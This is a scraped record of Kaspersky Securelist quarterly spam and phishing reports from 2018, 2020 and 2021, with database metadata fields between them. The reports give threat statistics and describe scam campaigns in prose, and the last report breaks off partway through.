In Q2, Trojans from the [Badun](<https://threats.kaspersky.com/en/threat/Trojan.Win32.Badun/>) family (7.09%) were the most common malicious attachments in spam, their share having increased by 1.3 p.p. These malicious programs, disguised as electronic documents, are often distributed in archives. In contrast, [Agensla](<https://threats.kaspersky.com/en/threat/Trojan-PSW.MSIL.Agensla/>) Trojans (6.65%), which specialize in stealing credentials, shed 2.26 p.p. and dropped to second place. The [Taskun](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Taskun/>) family (4.25%), which exploits Windows Task Scheduler, rounds out the TOP 3. These Trojans, like Badun, are gaining popularity.

_TOP 10 malware families in mail traffic, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03144835/05-en-spam-report-q2-2021.png>))_

Exploits for [CVE-2017-11882](<https://threats.kaspersky.com/en/threat/Exploit.MSOffice.CVE-2017-11882/>) (4.07%), an Equation Editor vulnerability popular with cybercriminals, gave ground and dropped to fourth place. Next come malicious [ISO](<https://threats.kaspersky.com/en/threat/Trojan.Win32.ISO/>) disk images (3.29%). Sixth and eighth places were occupied by Noon spyware Trojans, which infect [any](<https://threats.kaspersky.com/en/threat/Trojan-Spy.MSIL.Noon/>) (2.66%) or [only 32-bit](<https://threats.kaspersky.com/en/threat/Trojan-Spy.Win32.Noon/>) (2.47%) versions of Windows. [Androm](<https://threats.kaspersky.com/en/threat/Backdoor.MSIL.Androm/>) backdoors (2.55%) lie in seventh position, while the TOP 10 is rounded out by malicious documents in the [SAgent](<https://threats.kaspersky.com/en/threat/Trojan.MSOffice.SAgent/>) (2.42%) and [Agent](<https://threats.kaspersky.com/en/threat/Trojan-Downloader.MSOffice.Agent/>) (2.11%) families.

_TOP 10 malicious attachments, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03144904/06-en-spam-report-q2-2021.png>))_

The TOP 10 attachments in spam differs only slightly from the ranking of malware families. The most widespread representative of the Agent family fell short of the TOP 10, but the ranking did find room for a Trojan from the [Crypt](<https://threats.kaspersky.com/en/threat/Trojan.MSIL.Crypt/>) family (2.06%), which includes heavily [obfuscated](<https://encyclopedia.kaspersky.com/glossary/obfuscation/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) and encrypted programs.

### Countries targeted by malicious mailings

More than anywhere else, Kaspersky solutions blocked malicious attachments on user devices in Spain (9.28%). The share of this country grew slightly against Q1 2021, adding 0.54 p.p. Second place was retained by Italy (6.38%), despite losing 1.21 p.p. Germany (5.26%) and Russia (5.82%) swapped places in Q2, while the UAE (5.36%) remained fourth, its share practically unchanged.

_Countries targeted by malicious spam, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03144933/07-en-spam-report-q2-2021.png>))_

Further down in the TOP 10 countries by number of users who came across malicious attachments in Q2 2021 are Vietnam (4.71%), Mexico (4.23%), Turkey (3.43%), Brazil (2.91%) and Malaysia (2.53%).

## Statistics: phishing

In phishing terms, Q2 2021 was fairly uneventful. The Anti-Phishing system detected and blocked 50,398,193 attempted redirects, with only 3.87% of our users encountering such phishing links.

### Geography of phishing attacks

Looking at the share of users by country on whose devices the Anti-Phishing system was triggered, we see that Brazil (6.67%), which lost first place last quarter, is back at the top.
It didn't get far ahead from Israel (6.55%) and France (6.46%), which topped the Q1 list.\n\n_Geography of phishing attacks, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03145007/08-en-spam-report-q2-2021.png>))_\n\n### Top-level domains\n\nThe traditional leader among top-level domain zones used by cybercriminals to post phishing pages is COM (31.67%). The ORG domain (8.79%) moved up to second place, pushing XYZ (8.51%) into third.\n\n_Top-level domain zones most commonly used for phishing, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03145039/09-en-spam-report-q2-2021.png>))_\n\nThe fourth most popular domain zone among cybercriminals in Q2 was China's CN (3.77%), followed by NET (3.53%). Russia's RU (2.98%) dropped to sixth place, and Tokelau's TK (1.65%) to eighth. Note also the cybercriminals' preference for international domain zones (six of the ten lines in this quarter's ranking).\n\n### Organizations under attack\n\n_The rating of organizations targeted by phishers is based on the triggering of the deterministic component in the Anti-Phishing system on user computers. The component detects all pages with phishing content that the user has tried to open by following a link in an email message or on the web, as long as links to these pages are present in the Kaspersky database._\n\nFor the first time since the start of the pandemic, online stores (19.54%) vacated the first line in the ranking of organizations most often used by cybercriminals as bait. Global internet portals (20.85%) stepped in as this quarter's leader. Moreover, the share of both categories increased relative to Q1: by 3.77 and 5.35 p.p., respectively. Third place belongs to banks (13.82%), which gained 3.78 p.p. 
in Q2.\n\n_Distribution of organizations whose users were targeted by phishers, by category, Q2 2021 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/08/03145107/10-en-spam-report-q2-2021.png>))_\n\nOverall, the list of the most popular organization categories among cybercriminals remained practically unchanged since the previous quarter, except that the shares of instant messengers (6.27%) and social networks (7.26%) almost drew level, and phishers preferred financial services (2.09%) to IT companies (1.68%).\n\n## Conclusion\n\nIn Q2, as we expected, cybercriminals continued to hunt for corporate account credentials and exploit the COVID-19 theme. A curious takeaway was the spike in investment-related activity. On the whole, however, the quarter did not deliver any surprises.\n\nAs for Q3 forecasts, the share of cyberattacks on the corporate sector is likely to stay the same. This is because remote working has established a firm foothold in the labor market. Also, the COVID-19 topic is unlikely to disappear from spam. And if the current crop of vaccination and compensation scams weren't enough, fraudsters could start utilizing newly identified strains of the virus to add variety and nowness to their schemes. What's more, during the vacation season, pandemic or not, we expect an increase in demand for intercity and international travel; as a result, the risk of encountering fake websites when buying tickets or booking accommodation will rise. Lastly, we will likely see waves of tourist-targeted attacks during major sporting occasions, such as the Olympic Games in Japan. 
Such events are always accompanied by thematic spam.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-05T10:00:45", "type": "securelist", "title": "Spam and phishing in Q2 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2021-08-05T10:00:45", "id": "SECURELIST:A4072107882E39592149B0DB12585D70", "href": "https://securelist.com/spam-and-phishing-in-q2-2021/103548/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-11-11T14:37:58", "description": "\n\n## Quarterly highlights\n\n### Personal data in spam\n\nWe have often said that personal data is candy on a stick to fraudsters and must be kept safe (that is, not given out on dubious websites). It can be used to gain access to accounts and in targeted attacks and ransomware campaigns.\n\nIn Q3, we registered a surge of fraudulent emails in spam traffic. This type of scam [we have already reported](<https://securelist.com/cryptoransom-spam/83691/>) at the beginning of the year. 
A ransom (in bitcoins) is demanded in exchange for not disclosing "damaging evidence" concerning the recipients. The new wave of emails contained users' actual personal data (names, passwords, phone numbers), which the scammers used to try to convince victims that they really had the information specified in the message. The spam campaign was carried out in several stages, and it is likely that the fraudsters made use of a range of personal information databases, as evidenced, for example, by the telephone number formats that varied from stage to stage.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06090042/181101-spam-and-phishing-in-q3-2018-1.png>)

Whereas before, the target audience was primarily English-speaking, in September we logged a spate of mailings in other languages, including German, Italian, Arabic, and Japanese.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06090143/181101-spam-and-phishing-in-q3-2018-2.png>)

The amount demanded by the ransomers ranged from a few hundred to several thousand dollars. To collect the payments, different Bitcoin wallets were used, which changed from mailing to mailing. In July, 17 transactions worth more than 3 BTC ($18,000 at the then exchange rate) were made to one such wallet.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06090324/181101-spam-and-phishing-in-q3-2018-3.png>)

**_Transactions to scammers' Bitcoin wallets_**

Also in Q3, we detected a [malicious spam campaign](<https://securelist.com/loki-bot-stealing-corporate-passwords/87595/>) aimed at corporate users. The main target was passwords (for browsers, instant messengers, email and FTP clients, cryptocurrency wallets, etc.). The cybercriminals attempted to infect victim computers with Loki Bot malware, concealing it in ISO files attached to messages. The latter were made to look like business correspondence or notifications from reputable companies.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06090454/181101-spam-and-phishing-in-q3-2018-4.png>)

### Malicious spam attacks against the banking sector

The owners of the Necurs botnet, which in Q2 was caught sending [malicious emails with IQY](<https://securelist.com/spam-and-phishing-in-q2-2018/87368/>) (Microsoft Excel Web Query) attachments, turned their attention to the banking sector and, as in Q2, used a non-typical file format for spam, this time PUB (Microsoft Publisher). Messages were sent to the email addresses of credit institutions in different countries, and the PUB file attachments contained Trojan loaders for downloading executable files (detected as [Backdoor.Win32.RA-based](<https://threats.kaspersky.com/en/threat/Backdoor.Win32.RA-based/>)) onto victim computers.

We observed that the owners of Necurs are making increasing use of various techniques to bypass security solutions and send malicious spam containing attachments with non-typical extensions so as not to arouse users' suspicion.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06090547/181101-spam-and-phishing-in-q3-2018-5.png>)

### New iPhone launch

Late Q3 saw the release of Apple's latest gizmo. Unsurprisingly, it coincided with a spike in email spam from Chinese "companies" offering Apple accessories and replica gadgets. Links in such messages typically point to a recently created, generic online store. Needless to say, having transferred funds to such one-day websites, you lose your money and your goods never arrive.

The release also went hand in hand with a slight rise in both the number of phishing schemes exploiting Apple (and its services) and messages with malicious attachments:

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06090709/181101-spam-and-phishing-in-q3-2018-8.png>)

### Classic pharma spam in a new guise

Spammers are constantly looking for ways to get round mail filters and increase the "deliverability" of their offers. To do so, they try to fabricate emails (both the contents and technical aspects) that look like messages from well-known companies and services. For example, they copy the layout of banking and other notifications and add bona fide headers in the fields that the user is sure to see.

Such techniques, typical of phishing and malicious campaigns, are being used more often in "classic spam" – for example, in messages offering prohibited medicines. For instance, this past quarter we detected messages disguised as notifications from major social networks, including LinkedIn. The messages contained a phoney link that we expected to point to a phishing form asking for personal data, but which instead took us to a drug store.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06090804/181101-spam-and-phishing-in-q3-2018-9.png>)

This new approach is taken because anti-spam solutions have long been able to detect this type of spam in its traditional form, so spammers have started using disguises. We expect this trend to pick up steam.

### Universities

Since the start of the academic year, scammers' interest in gaining access to accounts on university websites has risen. We [registered attacks](<https://securelist.com/phishing-for-knowledge/88268/>) against 131 universities in 16 countries worldwide. Cybercriminals want to get their hands on both personal data and academic research.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06091020/181101-spam-and-phishing-in-q3-2018-10.png>)

**_Fake login pages to personal accounts on university websites_**

### Job search

To harvest personal data, attackers exploit people's job-hunting efforts. Pages with application forms lure victims with tempting offers of careers in a big-name company, a large salary, and the like.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06091513/181101-spam-and-phishing-in-q3-2018-11.png>)

### Propagation methods

This quarter we are again focused on the ways in which phishing and other illegitimate content is distributed by cybercriminals. But this time we also want to draw attention to methods that are gaining popularity and being actively exploited by attackers.

#### Scam notifications

Some browsers make it possible for websites to send notifications to users (for example, the Push API in Chrome), and this technology has not gone unnoticed by cybercriminals. It is mainly deployed by websites that collaborate with various partner networks. With the aid of pop-up notifications, users are lured onto "partner" sites, where they are prompted to enter, for example, personal data. The owners of the resource receive a reward for every user they process.

By default, Chrome requests permission to enable notifications for each individual site, and so as to nudge the user into making an affirmative decision, the attackers state that the page cannot continue loading without a little click on the Allow button.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06091607/181101-spam-and-phishing-in-q3-2018-12.png>)

Having given the site permission to display notifications, many users simply forget about it, so when a pop-up message appears on the screen, they don't always understand where it came from.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06091821/181101-spam-and-phishing-in-q3-2018-13.png>)

**_Notifications are tailored to the user's location and displayed in the appropriate language_**

The danger is that notifications can appear when the user is visiting a trusted resource. This can mislead the victim as regards the source of the message: everything seems to suggest it came from the trusted site currently open. The user might see, for instance, a "notification" about a funds transfer, giveaway, or tasty offer. They all generally lead to phishing sites, online casinos, or sites with fake giveaways and paid subscriptions:

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06091953/181101-spam-and-phishing-in-q3-2018-14.png>)

**_Examples of sites that open when users click on a notification_**

Clicking on a notification often leads to an online gift card generator, which we [covered](<https://securelist.com/giftcard-generators/86522>) earlier in the quarter (it also works in the opposite direction: the resource may prompt the user to enable push notifications). Such generators offer visitors the chance to generate free gift card codes for popular online stores. The catch is that in order to get the generated codes, the visitor needs to prove they are human by following a special link. Instead of receiving a code, the user is sent on a voyage through a long chain of partner sites with invitations to take part in giveaways, fill out forms, download stuff, sign up for paid SMS mailings, and much more.

#### Media

The use of media resources is a rather uncommon, yet effective way of distributing fraudulent content. This point is illustrated by the story of the quite popular WEX cryptocurrency exchange, which prior to 2017 went by the name of BTC-E. In August 2018, fake news was inserted into thematic "third tier" Russian media saying that, due to internal problems, the exchange was changing its domain name to wex.ac:

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06092107/181101-spam-and-phishing-in-q3-2018-15.png>)

The wex.nz administration soon tweeted (its tweets are published on the exchange's home page) that wex.ac was just another imitator and warned users against transferring funds to it.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06092204/181101-spam-and-phishing-in-q3-2018-16.png>)

But that did not stop the scammers, who released more news about the exchange moving to a new domain, this time in the .sc zone:

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06092323/181101-spam-and-phishing-in-q3-2018-17.png>)

#### Instagram

Among the social media platforms used by scammers to distribute content, Instagram warrants a special mention. Only relatively recently have cybercriminals started paying attention to it. In Q3 2018, we came across many fake US Internal Revenue Service user accounts in this social network, as well as many others purporting to be an official account of one of the most widely-used Brazilian banks.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06085444/181101-spam-and-phishing-in-q3-2018-18.png>)

**_Fake IRS accounts on Instagram_**

Scammers not only create fakes, but seek access to popular accounts: August this year saw a wave of account hacking sweep through the social network. We observed accounts changing owners as a result of phishing attacks with "account verification" prompts – users themselves delivered their credentials on a plate in the hope of [getting the cherished blue tick](<https://www.kaspersky.com/blog/instagram-hijack/23585>).

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06085411/181101-spam-and-phishing-in-q3-2018-19.png>)

Back when scammers offered to "verify" accounts, there was no such function in the social network: the administration itself decided whom to award the sacred "badge." Now it is possible to [apply for one through the account settings](<https://help.instagram.com/1080769608648426>).

## Statistics: spam

### Proportion of spam in email traffic

**_Proportion of spam in global email traffic, Q2 and Q3 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06095003/spam-and-phishing-in-q3-2018_en_01.png>)_**

In Q3 2018, the largest share of spam was recorded in August (53.54%). The average percentage of spam in global mail traffic was 52.54%, up 2.88 p.p. against the previous reporting period.

### Sources of spam by country

**_Sources of spam by country, Q3 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06095029/spam-and-phishing-in-q3-2018_en_02.png>)_**

The three leading source countries for spam in Q3 were the same as in Q2 2018: China is in first place (13.47%), followed by the USA (10.89%) and Germany (10.37%). Fourth place goes to Brazil (6.33%), and fifth to Vietnam (4.41%). Argentina (2.64%) rounds off the Top 10.

### Spam email size

**_Spam email size, Q2 and Q3 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06095053/spam-and-phishing-in-q3-2018_en_03.png>)_**

In Q3 2018, the share of very small emails (up to 2 KB) in spam fell by 5.81 p.p. to 73.36%. The percentage of emails sized 5-10 KB increased slightly compared to Q2 (+0.76 p.p.) and amounted to 6.32%. Meanwhile, the proportion of 10-20 KB emails dropped by 1.21 p.p. to 2.47%. The share of 20-50 KB spam messages remained virtually unchanged, climbing a mere 0.49 p.p. to 3.17%.

### Malicious attachments: malware families

**_Top 10 malicious families in mail traffic, Q3 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06095117/spam-and-phishing-in-q3-2018_en_04.png>)_**

According to the results of Q3 2018, the most common malware in mail traffic was still objects assigned the verdict Exploit.Win32.CVE-2017-11882 (11.11%), adding 0.76 p.p. since the last quarter. The Backdoor.Win32.Androm bot was encountered more frequently than in the previous quarter and ranked second (7.85%), while Trojan-PSW.Win32.Farei dropped to third place (5.77%). Fourth and fifth places were taken by Worm.Win32.WBVB and Backdoor.Java.QRat, respectively.

### Countries targeted by malicious mailshots

**_Countries targeted by malicious mailshots, Q3 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06095143/spam-and-phishing-in-q3-2018_en_05.png>)_**

The Top 3 countries by number of Mail Anti-Virus triggers in Q3 remain unchanged since the start of the year: Germany took first place (9.83%), with Russia in second (6.61%) and the UK in third (6.41%). They were followed by Italy in fourth (5.76%) and Vietnam in fifth (5.53%).

## Statistics: phishing

In Q3 2018, the Anti-Phishing system prevented **137,382,124** attempts to direct users to scam websites. **12.1%** of all Kaspersky Lab users worldwide were subject to attack.

### Geography of attacks

The country with the highest percentage of users attacked by phishing in Q3 2018 was Guatemala with 18.97% (+8.56 p.p.).

**_Geography of phishing attacks, Q3 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06095211/spam-and-phishing-in-q3-2018_en_06.png>)_**

Q2's leader Brazil dropped to second place, with 18.62% of users in this country attacked during the reporting period, up 3.11 p.p. compared to Q2. Third and fourth places went to Spain (17.51%) and Venezuela (16.75%), with Portugal rounding off the Top 5 (16.01%).

| Country | %* |
|---|---|
| Guatemala | 18.97 |
| Brazil | 18.62 |
| Spain | 17.51 |
| Venezuela | 16.75 |
| Portugal | 16.01 |
| China | 15.99 |
| Australia | 15.65 |
| Panama | 15.33 |
| Georgia | 15.10 |
| Ecuador | 15.03 |

_* Share of users on whose computers Anti-Phishing was triggered out of all Kaspersky Lab users in the country_

### Organizations under attack

_The rating of categories of organizations attacked by phishers is based on triggers of the Anti-Phishing component on user computers. It is activated every time the user attempts to open a phishing page, either by clicking a link in an email or a social media message, or as a result of malware activity. When the component is triggered, a banner is displayed in the browser warning the user about a potential threat._

As in the previous quarter, the Global Internet Portals category was in first place, bumping its share up to 32.27% (+7.27 p.p.).

**_Distribution of organizations whose users were attacked by phishers, by category, Q3 2018 [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/06095237/spam-and-phishing-in-q3-2018_en_07.png>)_**

_Only organizations that can be combined into a general Finance category were attacked more than global Internet portals. This provisional category accounted for 34.67% of all attacks (-1.03 p.p.): banks and payment systems had respective shares of 18.26% and 9.85%; only online stores (6.56%) had to concede fourth place to IT companies (6.91%)._

## Conclusion

In Q3 2018, the average share of spam in global mail traffic rose by 2.88 p.p. to 52.54%, and the Anti-Phishing system prevented more than 137 million redirects to phishing sites, up 30 million against the previous reporting period.

Spammers and phishers continue to exploit big news stories. This quarter, for instance, great play was made of the release of the new iPhone. The search for channels to distribute fraudulent content also continued. Alongside an uptick in Instagram activity, we spotted fake notifications from websites and the spreading of fake news through media resources.

A separate mention should go to the expanding geography of ransomware spam, featuring the use of victims' real personal data.

_Source: Securelist, "Spam and phishing in Q3 2018", published 2018-11-06, https://securelist.com/spam-and-phishing-in-q3-2018/88686/_

## Spam and phishing in Q2 2020

## Quarterly highlights

### Targeted attacks

The second quarter often saw phishers resort to targeted attacks, especially against fairly small companies. To attract attention, scammers imitated email messages and websites of companies whose products or services their potential victims could be using.

The scammers did not try to make any of the website elements appear credible as they created the fake. The login form is the only exception. One of the phishing websites we discovered even used a real captcha on that form.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04160309/sl_spam_report_q2_01.png>)

The main pretext that scammers use to prompt the target to enter their information is offering an online catalog that purportedly only becomes available once the target provides the login and password to their email account.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04160339/sl_spam_report_q2_02.png>)

In one instance, phishers used Microsoft Sway, the service for creating and sharing presentations, to hunt for logins and passwords for corporate accounts.
The user was offered to view presentations belonging to another company in the same industry by following a link and entering the login and password for their work email account.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04160407/sl_spam_report_q2_03.png>)\n\nA fake website can be recognized by its design. The workmanship is often rough, and the chunks of information on the various pages are disjointed due to being pulled from diverse sources. Besides, pages like that are created on free hosting websites, as cybercriminals are not prepared to invest too much money in the fakes.\n\nA targeted phishing attack may lead to [serious consequences](<https://www.kaspersky.com/blog/fighting-internal-bec/>): after gaining access to an employee's mailbox, cybercriminals can use it for further attacks on the company itself, or its employees or partners.\n\n### Waiting for your package: keeping your data secure and your computer, clean\n\nAs the pandemic reached its peak, mail service between countries became complicated and delivery times noticeably increased. Organizations responsible for delivery of letters and parcels rushed to notify recipients about all kinds of possible delays and hiccups. This is exactly the type of email messages that scammers started to imitate: the target was offered to open the attachment to find out the address of the warehouse with the package that had failed to reach them.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04160436/sl_spam_report_q2_04.png>)\n\nAnother, relatively original, trick employed by cybercriminals was a message containing a miniature image of a postal receipt. The scammers expected the curious recipient to take the attachment, which was an ACE archive despite its name containing "jpg", for the real thing and open it. The mailshots we detected used this as a method of spreading the Noon spyware. 
The scam can only be detected if the email client displays the full names of attachments.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04160459/sl_spam_report_q2_05.png>)\n\nIn another fraudulent scheme, the target was to told that their order could not be dispatched due to a restriction on mailing of certain types of goods, but the processing of the package would be resumed once the restrictions were lifted. All required documents and a new tracking number could purportedly be found in the attached archive. In reality, the attachment contained a copy of the Androm backdoor, which opened remote access to the victim's computer.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04160527/sl_spam_report_q2_06.png>)\n\nScammers posing as courier service employees sent out email warning that packages could not be delivered due to failure to pay for the shipping. The "couriers" accepted codes for prepaid cards issued by Paysafecard as payment. These cards range from \u20ac10 to \u20ac100 and can be used in stores that accept this payment method. The victim was offered to email a \u20ac50 card code \u2013 incidentally, an activity that the payment system's rules explicitly forbid. The cybercriminals chose this payment method for a reason: blocking or revoking a Paysafecard payment is next to impossible.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04160552/sl_spam_report_q2_07.png>)\n\n### Banking phishing amid a pandemic\n\nBanking phishing attacks in the second quarter of the year often employed emails that offered borrowers various pandemic-related discounts and bonuses. Accessing the benefits involved downloading a file with a manual or following a link. 
As a result, the scammers could access the user's computer, personal data or credentials for various services, depending on the scheme.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04160622/sl_spam_report_q2_08.png>)\n\nThe COVID-19 theme was present, too, in the widely known fake bank emails informing customers that their accounts had been blocked, and that they needed to enter their login and password on a special page to get back their access.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04160654/sl_spam_report_q2_09.png>)\n\nThe pandemic saw the revival of a more-than-a-decade-old scheme, in which scammers sent victims emails offering to open the attachment to get the details of a low-rate loan. This time, the rate reduction was linked to the pandemic.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04160717/sl_spam_report_q2_10.png>)\n\n### Taxes and exemptions\n\nThe beginning of the second quarter is the time for submitting tax forms in many countries. This year, tax authorities in some countries reduced the tax burden or exempted citizens from paying taxes. Scammers naturally grabbed the opportunity: mailshots we detected reported that the government had approved a compensation payout, and claiming it involved following a link to the tax agency's website, which, unsurprisingly, proved to be fake. 
Some of the email messages were not too well crafted, and looking closely at the From field was all it took to detect a fake.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04160742/sl_spam_report_q2_11.png>)\n\nMore ingenious scammers made up a whole legend: in an email presented as being from the IRS (United States Internal Revenue Service), they said there was a $500,000 "pandemic payment", authorized jointly by the UN and the World Bank, that could have been transferred to the recipient if it had not been for a woman named Annie Morton. The lady, the email said, had shown up at an IRS office carrying a warrant for the payment. She purportedly said that the intended recipient had succumbed to COVID-19, and she was the one to receive the $500,000. The message insisted that the victim contact a certain IRS employee – and not any other, so as to avoid a mistake – to prove that they were alive.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04160814/sl_spam_report_q2_12.png>)\n\nSubsequent steps would most likely be identical to the well-known inheritance scam, where the victim is asked to pay for the services of a lawyer, who then disappears with the advance money. One might guess that instead of the advance, the scammers would ask for a fee for executing papers that would prove the victim was still alive.\n\n### Getting refunded and losing it all\n\nTax refunds are not the only type of aid that states have been providing to individuals and companies distressed by the pandemic, and not the only type the scammers have been using. Thus, Brazilians were "allowed" not to pay their energy bills, and all they had to do was register on a website by following a link in an "email from the government". 
The hyperlink was crafted to make the user believe they were being redirected to a government portal, whereas in reality, following it installed a trojan on the victim's computer, which downloaded and then ran another trojan, Sneaky.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04160850/sl_spam_report_q2_13.png>)\n\nA personal information leak is another hazard faced by those who risk registering for "compensation" on a suspicious website. For example, one mailshot invited individuals aged over seventy to visit a website and fill out a form, which contained fields for the last name, first name, gender, mailing address and SSN (social security number, for US citizens).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04160915/sl_spam_report_q2_14.png>)\n\nIdentifying the fake email is easy. One just needs to take a closer look at the From field and the subject, which looks odd for an official email.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04160942/sl_spam_report_q2_15.png>)\n\nOnce the target filled out the entire form, they were redirected to the official Web page of the World Health Organization's COVID-19 Solidarity Response Fund, a real organization, to give a donation. This helped the scammers to create an illusion that the questionnaire was official and to build a vast database containing the details of individuals over seventy years of age.\n\nFake emails promising government compensation carried one more threat: instead of getting paid, the victim risked losing their own money to the cybercriminals. Thus, a fake email from the International Monetary Fund announced that the recipient and sixty-four other "lucky" individuals had been selected to receive compensation from a five-hundred-million-dollar fund set up by the IMF, China and the European Union for supporting victims of the pandemic. 
Getting €950,000 was a matter of contacting the IMF office at the address stated in the message. Subsequent events followed the lottery-scam script: getting the money required paying a commission first.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04161017/sl_spam_report_q2_16.png>)\n\n### Fake HR: getting dismissed by professional spammers\n\nThe pandemic-related economic downturns in several countries caused a surge in unemployment, an opportunity that cybercriminals were quick to take advantage of. One mailshot, sent in the name of the US Department of Labor, invited recipients to look at the latest changes to the parental leave and sick leave laws. The sender said these laws had been amended following the adoption of the coronavirus relief act, and all details on the amendments were available in the attachment. What the attachment really contained was [Trojan-Downloader.MSOffice.SLoad.gen](<https://threats.kaspersky.com/en/threat/Trojan-Downloader.MSOffice.SLoad/>), a trojan mostly used for downloading and installing ransomware.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04161249/sl_spam_report_q2_18.png>)\n\nAnother way scammers "surprised" potential victims was with dismissal notices. The employee was informed that the company had been forced to discharge them due to the pandemic-induced recession. The dismissal "followed the book", in that the attachment, according to the author of the email, contained a request form for two months' worth of pay. Needless to say, the victim only found malware attached.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/21132436/sl_spam_report_q2_19_2.jpg>)\n\n### Your data wanted, now\n\nThe share of voice phishing in email traffic rose noticeably at the end of Q2 2020. 
One mailshot warned of a suspicious attempt at logging in to the target's Microsoft account, originating in another country, and recommended that the target contact support by phone at the supplied number. This spared the scammers the need to create a large number of fake pages, as they tried to get all the information they needed over the phone.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04161501/sl_spam_report_q2_23.png>)\n\nAn even less conventional way of obtaining personal data could be found in emails that offered a subscription to COVID-19 updates, where the target only needed to verify their email address. Besides personal data theft, forms like this can be used for collecting mailbox usage statistics.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04161522/sl_spam_report_q2_24.png>)\n\n## Statistics: spam\n\n### Proportion of spam in email traffic\n\n_Proportion of spam in global email traffic, Q1 2020 – Q2 2020 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/04164340/sl_spam_report_q2_01-en-dolya-spama-v-mirovom-pochtovom-trafike-q1-2020-q2-2020-gg.png>))_\n\nIn Q2 2020, the largest share of spam (51.45 percent) was recorded in April. The average percentage of spam in global email traffic was 50.18 percent, down by 4.43 percentage points from the previous reporting period.\n\n_Proportion of spam in Runet 